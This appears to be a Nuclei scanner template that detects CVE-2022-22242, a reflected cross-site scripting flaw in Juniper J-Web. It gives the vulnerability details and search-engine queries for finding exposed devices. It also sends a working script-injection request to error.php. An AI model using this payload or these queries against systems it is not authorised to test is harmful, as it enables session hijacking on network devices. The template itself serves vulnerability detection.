Juniper Web Device Manager - Cross-Site Scripting

id: CVE-2022-22242

info:
  name: Juniper Web Device Manager - Cross-Site Scripting
  author: EvergreenCartoons
  severity: medium
  description: |
    Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability.
  reference:
    - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
    - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
    - https://kb.juniper.net/JSA69899
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22242
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-22242
    cwe-id: CWE-79
    epss-score: 0.43644
    epss-percentile: 0.97362
    cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: juniper
    product: junos
    shodan-query:
      - title:"Juniper Web Device Manager"
      - http.title:"juniper web device manager"
    fofa-query: title="juniper web device manager"
    google-query: intitle:"juniper web device manager"
  tags: cve2022,cve,xss,juniper,junos

http:
  - method: GET
    path:
      - '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "The requested resource is not authorized to view"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009dc11da385441b20fefa008fe30a2f64d3f86c3f88be834410002eca142f3b0e022031318c98ea766ad592c15d83c16ceb4d968f230131e11cd53d71430773c7a06b:922c64590222798bb761d5b6d8e72950